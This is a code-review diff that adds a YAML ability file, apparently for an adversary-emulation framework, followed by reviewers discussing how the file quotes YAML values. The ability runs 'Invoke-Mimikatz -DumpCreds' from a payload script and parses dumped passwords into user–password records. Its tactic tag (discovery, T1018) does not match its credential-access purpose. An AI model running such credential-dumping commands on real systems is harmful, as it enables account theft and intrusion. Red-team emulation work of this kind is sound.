data/abilities/credential-access/9179709f-23f6-482f-9a1e-025cea20bd6e.yml

```diff
@@ -0,0 +1,21 @@
+---
+- id: 9179709f-23f6-482f-9a1e-025cea20bd6e
+  name: Powerkatz (XOR'd Payload)
+  description: Use Invoke-Mimikatz
+  tactic: discovery
+  technique:
+    attack_id: T1018
+    name: Remote System Discovery
+  platforms:
+    windows:
+      psh:
+        payload: invoke-mimi.ps1
+        command: |
+          Import-Module .\invoke-mimi.ps1;
+          Invoke-Mimikatz -DumpCreds
+        parser:
+          name: mimikatz
+          property: host.user.password
+          script: 'Password\s:\s(.*)'
+  consequence:
+    - '#{host.user.name},has_password,#{host.user.password}'
```

Comment:
do we need these to have quotes around them? seems like it would be cleaner to not have them.. thoughts?

Reply:
You're right. YAML was interpreting the # character as a comment so I was looking for a solution. But as a long term solution the quotes are a bit clunky.

Reply:
could you make these raw text, using the pipe character? such as:
```
...
consequence: |
    - #{host.user.name}...
```

Reply:
Good call!